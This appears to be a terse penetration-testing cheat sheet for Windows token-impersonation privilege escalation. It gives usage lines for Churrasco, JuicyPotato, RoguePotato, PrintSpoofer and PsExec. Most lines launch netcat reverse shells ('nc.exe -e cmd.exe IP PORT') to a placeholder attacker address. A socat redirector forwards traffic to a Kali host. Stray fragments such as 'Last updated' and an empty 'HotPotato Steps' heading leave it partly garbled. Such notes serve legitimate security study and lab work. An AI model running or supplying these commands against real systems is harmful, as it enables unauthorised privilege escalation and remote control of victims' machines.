windows token exploits
Churrasco
# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"HotPotato
Steps:
SeBackupPrivilege
Last updated
# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"Last updated
> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID
> PSExec64.exe -i -u "nt authority\local service" <shell.exe>> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999